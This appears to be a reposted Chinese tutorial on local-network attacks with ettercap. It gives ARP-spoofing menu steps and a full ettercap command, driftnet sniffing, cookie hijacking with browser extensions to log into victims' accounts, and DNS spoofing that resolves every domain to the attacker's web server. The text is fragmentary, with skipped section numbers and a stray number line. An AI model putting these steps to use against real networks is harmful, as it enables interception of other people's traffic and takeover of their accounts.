1.arp 欺骗
简单原理: 主机 A 说自己是网关, 骗将发给网关的数据发给主机 A, 然后由主机 A 发送给真正的网关; 主机 A 告诉网关它就是主机 B, 骗将发给 B 的数据发给主机 A, 然后由 A 转发给主机 B.
ettercap 工具:
ettercap -C 或者 ettercap -G
Hosts---Scan for hosts---Hosts list
选择目标 ip---add to target 1--- 选定网关 ip---add to target 2
- mitm --- arp posoning --- sniff remote connections
- start --- start sniffing
- view -- connections
- ettercap -i eth0 -Tq -M arp:remote / 目标 ip/ / 网关 ip/ #eth0 是网卡, 对目标主机进行 arp 欺骗 也可以使用上面的方式
- driftnet -i eth0 #监听网卡 eth0
3. 利用 cookie 劫持, 登入被攻击者的网络账户
Chrome: 安装 Cookie 利用神器, CookieHacker, 安装地址: https://github.com/evilcos/cookiehacker
Firefox: 安装 Scripish+Original Cookie Injector, 构建一个可以在特定网页中嵌入 cookies 的工具:
Scripish 脚本引擎下载地址: https://addons.mozilla.org/zh-CN/firefox/addon/scriptish/
Original Cookie Injector 脚本安装地址: http://userscripts.org/scripts/show/119798
直接手动注入 cookie 即可
4.DNS 欺骗
- 4)VIM /etc/ettercap/etter.dns #新增几个 A 记录, 解析到本机, 如
- www.baidu.com A 192.168.43.133(写本机的 ip) #新增 A 记录, 将 www.baidu.com 解析到本机
- *.*.* A 192.168.43.133 #将所有域名解析到本机
- 6)service apache2 start #启动 apache 服务器, 目标计算机访问 www.baidu.com 会跳转到本机服务器
- 144115199312887883
来源: http://www.bubuko.com/infodetail-3412031.html